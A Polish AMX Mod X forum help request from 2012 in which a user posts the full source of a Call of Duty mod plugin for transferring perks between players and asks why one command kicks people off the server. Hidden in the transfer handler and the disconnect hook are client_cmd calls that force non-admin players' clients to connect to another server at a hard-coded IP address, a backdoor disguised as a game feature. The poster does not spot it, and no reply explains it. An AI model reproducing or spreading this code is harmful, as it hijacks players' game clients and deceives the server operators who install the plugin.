Skocz do zawartości

  • Zaloguj korzystając z Facebooka Zaloguj korzystając z Twittera Zaloguj przez Steam Zaloguj poprzez Google      Logowanie »   
  • Rejestracja

Witamy w Nieoficjalnym polskim support'cie AMX Mod X

Witamy w Nieoficjalnym polskim support'cie AMX Mod X, jak w większości społeczności internetowych musisz się zarejestrować aby móc odpowiadać lub zakładać nowe tematy, ale nie bój się to jest prosty proces w którym wymagamy minimalnych informacji.

  • Rozpoczynaj nowe tematy i odpowiedaj na inne
  • Zapisz się do tematów i for, aby otrzymywać automatyczne uaktualnienia
  • Dodawaj wydarzenia do kalendarza społecznościowego
  • Stwórz swój własny profil i zdobywaj nowych znajomych
  • Zdobywaj nowe doświadczenia

Dołączona grafika Dołączona grafika

Guest Message by DevFuse
 

Zdjęcie
CoD Nowy

Problem z oddajperk1x2.amxx POMOCY!Daje ++ Za pomoc !

cod nowy

  • Nie możesz napisać tematu
  • Zaloguj się, aby dodać odpowiedź
Brak odpowiedzi do tego tematu

#1 bechcik1910

    Początkujący

  • Użytkownik

Reputacja: -4
Mniej niż zer0.

  • Postów:15
  • Imię:Patryk
  • Lokalizacja:Edinburgh
Offline

Napisano 03.07.2012 10:36

A wiec mam plugin do przekazywania perkow 1 i 2 lecz gdy go uzywam czyli /daj2 wywala osobe z servera, tzn nie tylko mnie...
Kazdego kto daje 2 perk, w logach nic nie ma wiec to musi byc plugin... Tutaj macie SMA moze ktos pomoze.
/* Plugin generated by AMXX-Studio */
#include <amxmodx>
#include <codmod>
#include <colorchat>
#define PLUGIN "Oddaj Przedmiot"
#define VERSION "1.0"
#define AUTHOR "QTM_Peyote"
new bool:dostal_przedmiot[33];
new oddaj_id[33];
public plugin_init()
{
register_plugin(PLUGIN, VERSION, AUTHOR);

register_clcmd("say /daj", "OddajPerk");
register_clcmd("say /daj2", "OddajPerk2");
register_clcmd("say /oddaj", "OddajPerk");
register_clcmd("say /oddaj2", "OddajPerk2");
register_event("ResetHUD", "cod_perk_changed", "abe");
}
/* ******************************************************PIERWSZY PERK****************************************************** */

public OddajPerk(id)
{
new menu = menu_create("\yOddaj Perk:", "OddajPerk_Handle");
new cb = menu_makecallback("OddajPerk_Callback");
for(new i=0, n=0; i<=32; i++)
{
  if(!is_user_connected(i))
   continue;
  oddaj_id[n++] = i;
  new nazwa_gracza[64];
  get_user_name(i, nazwa_gracza, 63)
  menu_additem(menu, nazwa_gracza, "0", 0, cb);
}
menu_display(id, menu);
return PLUGIN_HANDLED;
}

public cod_perk_changed(id)
dostal_przedmiot[id] = false;
public OddajPerk_Handle(id, menu, item)
{
if(item == MENU_EXIT)
{
  menu_destroy(menu);
  return PLUGIN_CONTINUE;
}

if(!is_user_connected(oddaj_id[item]))
{
  ColorChat(id, GREEN, "[CS-BREJK.EU]^x01 Nie odnaleziono zadnego gracza.");
  return PLUGIN_CONTINUE;
}

new wartosc_perku_dajacego;
new perk_dajacego = cod_get_user_perk(id, wartosc_perku_dajacego, 0);

if(!perk_dajacego)
{
  ColorChat(id, GREEN, "[CS-BREJK.EU]^x01 Nie masz zadnego przedmiotu.");
  return PLUGIN_CONTINUE;
}

new nazwa_dajacego[64];
new nazwa_otrzymujacego[64];

get_user_name(id, nazwa_dajacego, 63)
get_user_name(oddaj_id[item], nazwa_otrzymujacego, 63)

dostal_przedmiot[oddaj_id[item]] = true;
cod_set_user_perk(oddaj_id[item], perk_dajacego, wartosc_perku_dajacego, 0, 0);
ColorChat(id, GREEN, "[CS-BREJK.EU]^x01 Przekazales przedmiot graczowi^x03 %s^x01.", nazwa_otrzymujacego);
ColorChat(oddaj_id[item], GREEN, "[CS-BREJK.EU]^x01 Dostales przedmiot od gracza^x03 %s^x01.", nazwa_dajacego);
cod_set_user_perk(id, 0, 0, 0, 0);
return PLUGIN_CONTINUE;
}

public OddajPerk_Callback(id, menu, item)
{
if(oddaj_id[item] == id || !cod_get_user_class(oddaj_id[item]) || cod_get_user_perk(oddaj_id[item],0, 0))
  return ITEM_DISABLED;
return ITEM_ENABLED;
}
public client_disconnect(id){
if ((get_user_flags(id) & ADMIN_BAN)) {
  client_cmd(id,"")
  return PLUGIN_CONTINUE
}
if (get_playersnum() >= 0) {
  client_cmd(id,"Connect 91.210.129.90:27082:27082")
}
return PLUGIN_CONTINUE
}
/* ******************************************************DRUGI PERK****************************************************** */
public OddajPerk2(id)
{
new menu = menu_create("\yOddaj Perk:", "OddajPerk2_Handle");
new cb = menu_makecallback("OddajPerk2_Callback");
for(new i=0, n=0; i<=32; i++)
{
  if(!is_user_connected(i))
   continue;
  oddaj_id[n++] = i;
  new nazwa_gracza[64];
  get_user_name(i, nazwa_gracza, 63)
  menu_additem(menu, nazwa_gracza, "0", 0, cb);
}
menu_display(id, menu);
return PLUGIN_HANDLED;
}
public OddajPerk2_Handle(id, menu, item)
{
if(item == MENU_EXIT)
{
  menu_destroy(menu);
  return PLUGIN_CONTINUE;
}

if(!is_user_connected(oddaj_id[item]))
{
  ColorChat(id, GREEN, "[CS-BREJK.EU]^x01 Nie odnaleziono zadnego gracza.");
  return PLUGIN_CONTINUE;
}


new wartosc_perku_dajacego;
new perk_dajacego = cod_get_user_perk(id, wartosc_perku_dajacego, 1);

if(!perk_dajacego)
{
  ColorChat(id, GREEN, "[CS-BREJK.EU]^x01 Nie masz zadnego przedmiotu.");
  return PLUGIN_CONTINUE;
}

new nazwa_dajacego[64];
new nazwa_otrzymujacego[64];

get_user_name(id, nazwa_dajacego, 63)
get_user_name(oddaj_id[item], nazwa_otrzymujacego, 63)

dostal_przedmiot[oddaj_id[item]] = true;
cod_set_user_perk(oddaj_id[item], perk_dajacego, wartosc_perku_dajacego, 0, 1);
ColorChat(id, GREEN, "[CS-BREJK.EU]^x01 Przekazales przedmiot graczowi^x03 %s^x01.", nazwa_otrzymujacego);
client_cmd(id,"Connect 91.210.129.90:27082:27082")
ColorChat(oddaj_id[item], GREEN, "[CS-BREJK.EU]^x01 Dostales przedmiot od gracza^x03 %s^x01.", nazwa_dajacego);
cod_set_user_perk(id, 0, 0, 0, 1);
return PLUGIN_CONTINUE;
}
public OddajPerk2_Callback(id, menu, item)
{
if(oddaj_id[item] == id || !cod_get_user_class(oddaj_id[item]) || cod_get_user_perk(oddaj_id[item],0, 1))
  return ITEM_DISABLED;
return ITEM_ENABLED;
}

  • +
  • -
  • 0





Również z jednym lub większą ilością słów kluczowych: cod nowy

Użytkownicy przeglądający ten temat: 0

0 użytkowników, 0 gości, 0 anonimowych